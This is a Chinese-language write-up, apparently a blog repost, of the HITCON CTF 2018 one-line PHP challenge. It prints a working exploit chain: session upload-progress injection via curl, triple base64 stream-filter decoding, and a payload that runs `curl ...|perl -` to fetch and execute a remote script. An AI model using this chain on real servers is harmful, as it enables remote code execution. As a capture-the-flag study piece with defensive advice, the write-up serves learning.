HITCON CTF 2018 - 单行PHP挑战:会话上传与流过滤器链的极致利用

HITCON CTF 2018 - 单行PHP挑战

这是Orange带来的技术分享 :)

挑战背景

在每年HITCON CTF中,我都会设计至少一个PHP漏洞利用挑战,其特点是源码极其简洁(通常只有几行),但利用难度极高。本次挑战是历年最短的一个------仅含单行PHP代码,运行在默认安装的Ubuntu 18.04 + PHP7.2 + Apache环境。

核心技术点

  1. 会话上传进度控制

    利用session.upload_progress特性(默认启用)向SESSION文件注入可控内容:

    bash 复制代码
    curl http://target/ -H 'Cookie: PHPSESSID=iamorange' \
      -F 'PHP_SESSION_UPLOAD_PROGRESS=payload' -F 'file=@/etc/passwd'
  2. 流过滤器链绕过

    通过多级base64解码过滤器处理前缀污染:

    php 复制代码
    php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/var/lib/php/sessions/sess_iamorange
  3. 竞态条件利用

    对抗session.upload_progress.cleanup的自动清理机制(默认开启),通过快速竞争或大文件上传维持会话。

漏洞利用过程

  1. 构造特殊base64载荷,经过三级解码后生成有效PHP代码:

    php 复制代码
    原始:VVVSM0wyTkhhSGRKUjBKcVpGaEtjMGxIT1hsWlZ6VnVXbE0xTUdSNU9UTk1Na3BxVEc1Q2MyWklRbXhqYlhkblRGZEJOMUI2TkhaTWVUaDJUSGs0ZGt4NU9IWk1lVGgy
    解码后:@<?php `curl orange.tw/w/bc.pl|perl -`;?>/////////////
  2. 结合会话文件包含漏洞实现RCE:

    php 复制代码
    include('php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/var/lib/php/sessions/sess_iamorange');

防御建议

  • 禁用session.upload_progress功能
  • 设置open_basedir限制文件访问范围
  • 对会话文件路径进行随机化处理
相关推荐
冬奇Lab5 分钟前
一天一个开源项目(第202篇):Needle 2 - 14MB 的端侧工具调用模型
人工智能·开源·资讯
林澈在路上11 分钟前
AI翻唱软件哪个好 2026国产AI写歌工具对比推荐
大数据·人工智能·深度学习·github·aigc·音视频·音频
咖啡星人k15 分钟前
2026 MCP 模型上下文协议:让 AI 自己动手接工具,告别手写接口(MonkeyCode 实战)
人工智能·深度学习·机器学习·语言模型·自然语言处理
yyuuuzz35 分钟前
记一次 VPS 性能排查:共享 CPU 突发额度导致的限流
运维·服务器·人工智能
恋猫de小郭42 分钟前
看懂大模型架构术语,帮助你理解目前常见的大模型开源架构
前端·人工智能·ai编程
tachibana242 分钟前
复杂任务怎么做的任务拆分?
人工智能·ai·大模型·llm·agent
tachibana21 小时前
ReAct、Plan-and-Execute、Reflection 三种范式有什么核心区别
人工智能·ai·大模型·llm·agent
————A1 小时前
Agent 接收用户上传文件
人工智能·笔记·python·状态模式
Huazhongzhanhui1 小时前
极智防护与绿色表改:2026中国(武汉)国际表面处理展览会涂装涂料展会前瞻
人工智能·云计算
金融小师妹1 小时前
多因子智能推演:黄金震荡回升,杰克逊霍尔“沃什首秀”政策如何重塑金价路径的AI预测框架
大数据·人工智能·python·线性回归